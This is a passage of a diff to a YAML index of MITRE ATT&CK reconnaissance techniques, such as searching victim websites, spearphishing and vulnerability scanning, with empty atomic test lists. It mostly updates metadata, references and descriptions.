-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-02T18:52:21.278Z'
       name: Search Victim-Owned Websites
-      description: |-
-        Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
-        Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+      description: "Adversaries may search websites owned by the victim for information
+        that can be used during targeting. Victim-owned websites may contain a variety
+        of details, including names of departments/divisions, physical locations,
+        and data about key employees such as names, roles, and contact info (ex: [Email
+        Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+        also have details highlighting business operations and relationships.(Citation:
+        Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+        actionable information. Information from these sources may reveal opportunities
+        for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+        or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+        establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+        or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+        initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+        or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+        to manually browsing the website, adversaries may attempt to identify hidden
+        directories or files that could contain additional sensitive information or
+        vulnerable functionality. They may do this through automated activities such
+        as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+        well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+        Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - James P Callahan, Professional Paranoid
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for suspicious network traffic that could be indicative
         of adversary reconnaissance, such as rapid successions of requests indicative
         of web crawling and/or large quantities of requests originating from a single
@@ -54465,13 +55147,41 @@ reconnaissance:
         Analyzing web metadata may also reveal artifacts that can be attributed to
         potentially malicious activity, such as referer or user-agent string HTTP/S
         fields.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+      created: '2020-10-02T16:51:50.306Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1594
+        external_id: T1594
+      - source_name: Perez Sitemap XML 2023
+        description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+          to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+          2024.
+        url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+      - source_name: Comparitech Leak
+        description: Bischoff, P. (2020, October 15). Broadvoice database of more
+          than 350 million customer records exposed online. Retrieved October 20,
+          2020.
+        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+      - source_name: Register Robots TXT 2015
+        description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+          you don't want them to look. Retrieved July 18, 2024.
+        url: https://www.theregister.com/2015/05/19/robotstxt/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.001:
     technique:
@@ -54496,7 +55206,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:13.409Z'
       name: DNS/Passive DNS
       description: |-
         Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -54512,8 +55222,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.003:
     technique:
@@ -54535,7 +55243,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:38:31.983Z'
       name: Identify Business Tempo
       description: |-
         Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -54551,8 +55259,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.001:
     technique:
@@ -54578,7 +55284,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:32:10.810Z'
       name: 'Gather Victim Host Information: Hardware'
       description: |-
         Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -54596,13 +55302,11 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1592.001
     atomic_tests: []
   T1598.003:
     technique:
-      modified: '2024-04-19T13:26:16.082Z'
+      modified: '2024-05-31T04:18:44.567Z'
       name: Spearphishing Link
       description: |-
         Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -54658,7 +55362,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: TrendMictro Phishing
         description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
           October 20, 2020.
@@ -54709,7 +55413,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.004:
     technique:
@@ -54730,7 +55433,7 @@ reconnaissance:
       - source_name: DNS Dumpster
         url: https://dnsdumpster.com/
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:33:02.476Z'
       name: Network Topology
       description: |-
         Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -54746,8 +55449,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.003:
     technique:
@@ -54769,7 +55470,7 @@ reconnaissance:
         url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
         description: García, C. (2019, April 3). Pentesting Active Directory Forests.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:22.917Z'
       name: Network Trust Dependencies
       description: |-
         Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -54785,8 +55486,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.001:
     technique:
@@ -54808,7 +55507,7 @@ reconnaissance:
         url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
         description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
           Intelligence Feeds. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:45:30.862Z'
       name: Threat Intel Vendors
       description: |-
         Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -54824,12 +55523,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589:
     technique:
-      modified: '2024-04-19T04:27:00.005Z'
+      modified: '2024-09-16T16:09:45.794Z'
       name: Gather Victim Identity Information
       description: |-
         Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -54869,8 +55566,8 @@ reconnaissance:
         external_id: T1589
       - source_name: OPM Leak
         description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
       - source_name: Detectify Slack Tokens
         description: Detectify. (2016, April 28). Slack bot token leakage exposing
           business critical information. Retrieved October 19, 2020.
@@ -54915,11 +55612,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:37:31.317Z'
       name: Vulnerability Scanning
       description: |-
         Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -54959,9 +55655,8 @@ reconnaissance:
         url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596:
     technique:
@@ -55023,7 +55718,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595:
     technique:
@@ -55049,7 +55743,7 @@ reconnaissance:
         url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
         description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
           October 20, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T20:58:13.661Z'
       name: Active Scanning
       description: |-
         Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55070,8 +55764,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.002:
     technique:
@@ -55136,7 +55828,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1598.004:
     technique:
@@ -55184,7 +55875,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.006:
     technique:
@@ -55206,7 +55896,7 @@ reconnaissance:
         url: https://nmap.org/book/firewalls.html
         description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
           and Intrusion Detection Systems. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:54.275Z'
       name: Network Security Appliances
       description: |-
         Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -55222,34 +55912,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
-      type: attack-pattern
-      created: '2020-10-02T16:50:12.809Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1593.002
-        url: https://attack.mitre.org/techniques/T1593/002
-      - source_name: SecurityTrails Google Hacking
-        url: https://securitytrails.com/blog/google-hacking-techniques
-        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-      - source_name: ExploitDB GoogleHacking
-        url: https://www.exploit-db.com/google-hacking-database
-        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
-          October 23, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T19:19:47.758Z'
       name: Search Engines
       description: |-
         Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55258,15 +55924,38 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+      created: '2020-10-02T16:50:12.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1593/002
+        external_id: T1593.002
+      - source_name: SecurityTrails Google Hacking
+        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+      - source_name: ExploitDB GoogleHacking
+        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+          October 23, 2020.
+        url: https://www.exploit-db.com/google-hacking-database
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.002:
     technique:
@@ -55288,7 +55977,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:36:58.964Z'
       name: Business Relationships
       description: |-
         Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -55304,8 +55993,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.003:
     technique:
@@ -55366,29 +56053,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1589.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
-      type: attack-pattern
-      created: '2020-10-02T14:57:15.906Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1589.003
-        url: https://attack.mitre.org/techniques/T1589/003
-      - source_name: OPM Leak
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
-        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:09:45.795Z'
       name: Employee Names
       description: |-
         Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -55397,15 +56065,34 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+      created: '2020-10-02T14:57:15.906Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1589/003
+        external_id: T1589.003
+      - source_name: OPM Leak
+        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.004:
     technique:
@@ -55431,7 +56118,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:35:09.668Z'
       name: Client Configurations
       description: |-
         Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -55449,47 +56136,10 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Philip Winther
-      - Sebastian Salla, McAfee
-      - Robert Simmons, @MalwareUtkonos
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
-      type: attack-pattern
-      created: '2020-10-02T17:08:57.386Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1598.002
-        url: https://attack.mitre.org/techniques/T1598/002
-      - source_name: Sophos Attachment
-        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
-        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
-          links – when phishers bring along their own web pages. Retrieved October
-          20, 2020.'
-      - source_name: GitHub Phishery
-        url: https://github.com/ryhanson/phishery
-        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
-          23, 2020.
-      - source_name: Microsoft Anti Spoofing
-        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
-        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
-          Retrieved October 19, 2020.
-      - source_name: ACSC Email Spoofing
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
-        description: Australian Cyber Security Centre. (2012, December). Mitigating
-          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-05-31T04:18:44.568Z'
       name: Spearphishing Attachment
       description: |-
         Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55498,19 +56148,55 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Philip Winther
+      - Sebastian Salla, McAfee
+      - Robert Simmons, @MalwareUtkonos
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
         accounts receiving messages from a single unusual/unknown sender. Filtering
         based on DKIM+SPF or header analysis can help detect when the email sender
         is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+      created: '2020-10-02T17:08:57.386Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1598/002
+        external_id: T1598.002
+      - source_name: ACSC Email Spoofing
+        description: Australian Cyber Security Centre. (2012, December). Mitigating
+          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: Sophos Attachment
+        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+          links – when phishers bring along their own web pages. Retrieved October
+          20, 2020.'
+        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+      - source_name: Microsoft Anti Spoofing
+        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+          Retrieved October 19, 2020.
+        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+      - source_name: GitHub Phishery
+        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+          23, 2020.
+        url: https://github.com/ryhanson/phishery
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.004:
     technique:
@@ -55533,7 +56219,7 @@ reconnaissance:
         description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
           Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
           You Can Do About It. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:47:55.905Z'
       name: CDNs
       description: |-
         Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -55549,8 +56235,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591:
     technique:
@@ -55576,7 +56260,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.343Z'
       name: Gather Victim Org Information
       description: |-
         Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -55592,8 +56276,6 @@ reconnaissance:
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
